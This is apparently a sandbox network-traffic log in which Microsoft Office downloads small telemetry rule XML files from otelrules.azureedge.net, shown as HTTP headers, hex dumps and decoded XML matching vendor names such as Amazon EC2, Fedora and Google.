                                            2024-11-18 20:16:44 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            69192.168.2.44981913.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:44 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:44 UTC491INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:44 GMT
                                            Content-Type: text/xml
                                            Content-Length: 448
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                            ETag: "0x8DC582BB389F49B"
                                            x-ms-request-id: 0fe31a08-b01e-001e-2cae-360214000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201644Z-1866b5c5fbbzzh8chC1DFWzc5c00000000gg00000000d4pe
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache-Info: L1_T2
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:44 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            70192.168.2.44982113.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:45 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:45 UTC491INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:45 GMT
                                            Content-Type: text/xml
                                            Content-Length: 416
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                            ETag: "0x8DC582BAEA4B445"
                                            x-ms-request-id: bdecc517-a01e-0050-3dc0-37db6e000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201645Z-16547b76f7ftnm6xhC1DFW9c8c00000005y0000000009a34
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache-Info: L1_T2
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:45 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            71192.168.2.44982013.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:45 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:45 UTC470INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:45 GMT
                                            Content-Type: text/xml
                                            Content-Length: 491
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                            ETag: "0x8DC582B98B88612"
                                            x-ms-request-id: 4e6a8ad7-601e-000d-69a9-362618000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201645Z-16547b76f7f6nr89hC1DFWz7ug00000002mg00000000f8cr
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:45 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            72192.168.2.44982313.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:45 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:45 UTC491INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:45 GMT
                                            Content-Type: text/xml
                                            Content-Length: 415
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                            ETag: "0x8DC582BA80D96A1"
                                            x-ms-request-id: 7f17f6e1-501e-00a3-5daf-36c0f2000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201645Z-16547b76f7fp6s5dhC1DFWe28g00000003f000000000rem7
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache-Info: L1_T2
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:45 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            73192.168.2.44982213.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:45 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:45 UTC470INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:45 GMT
                                            Content-Type: text/xml
                                            Content-Length: 479
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                            ETag: "0x8DC582B989EE75B"
                                            x-ms-request-id: 0ff73494-201e-0085-1d7b-3734e3000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201645Z-164f84587bf7jb9dhC1DFWkay400000005ug00000000vn5q
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:45 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            74192.168.2.44982413.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:45 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:45 UTC470INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:45 GMT
                                            Content-Type: text/xml
                                            Content-Length: 471
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                            ETag: "0x8DC582B97E6FCDD"
                                            x-ms-request-id: 885b02a2-801e-0035-1509-37752a000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201645Z-16547b76f7fl5zvnhC1DFWtk9g00000004qg00000000gq5h
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:45 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            75192.168.2.44982513.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:45 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:46 UTC470INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:46 GMT
                                            Content-Type: text/xml
                                            Content-Length: 419
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                            ETag: "0x8DC582B9C710B28"
                                            x-ms-request-id: 2012891f-801e-00ac-7a8d-35fd65000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201646Z-164f84587bfsqsthhC1DFWh63000000005eg000000006wcv
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:46 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            76192.168.2.44982613.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:45 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:46 UTC491INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:46 GMT
                                            Content-Type: text/xml
                                            Content-Length: 477
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                            ETag: "0x8DC582BA54DCC28"
                                            x-ms-request-id: 4dbbda22-e01e-0033-5212-374695000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201646Z-164f84587bfn7ppchC1DFW45b400000000kg00000000qufz
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache-Info: L1_T2
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:46 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            77192.168.2.44982713.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:46 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:46 UTC470INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:46 GMT
                                            Content-Type: text/xml
                                            Content-Length: 419
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                            ETag: "0x8DC582BB7F164C3"
                                            x-ms-request-id: 49f8120e-101e-0046-25ca-3691b0000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201646Z-164f84587bfghdt4hC1DFWu5nn000000061000000000rfca
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:46 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            78192.168.2.44982813.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:46 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:46 UTC491INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:46 GMT
                                            Content-Type: text/xml
                                            Content-Length: 477
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                            ETag: "0x8DC582BA48B5BDD"
                                            x-ms-request-id: eef1fd5d-a01e-006f-4c9a-3613cd000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201646Z-164f84587bftbpb6hC1DFWm4kg000000050g00000000n27d
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            X-Cache-Info: L1_T2
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:46 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            79192.168.2.44982913.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:47 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:47 UTC470INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:47 GMT
                                            Content-Type: text/xml
                                            Content-Length: 419
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                            ETag: "0x8DC582B9FF95F80"
                                            x-ms-request-id: 33178deb-401e-0048-6eb6-370409000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201647Z-1866b5c5fbblmztchC1DFWs6v400000004x00000000085b4
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
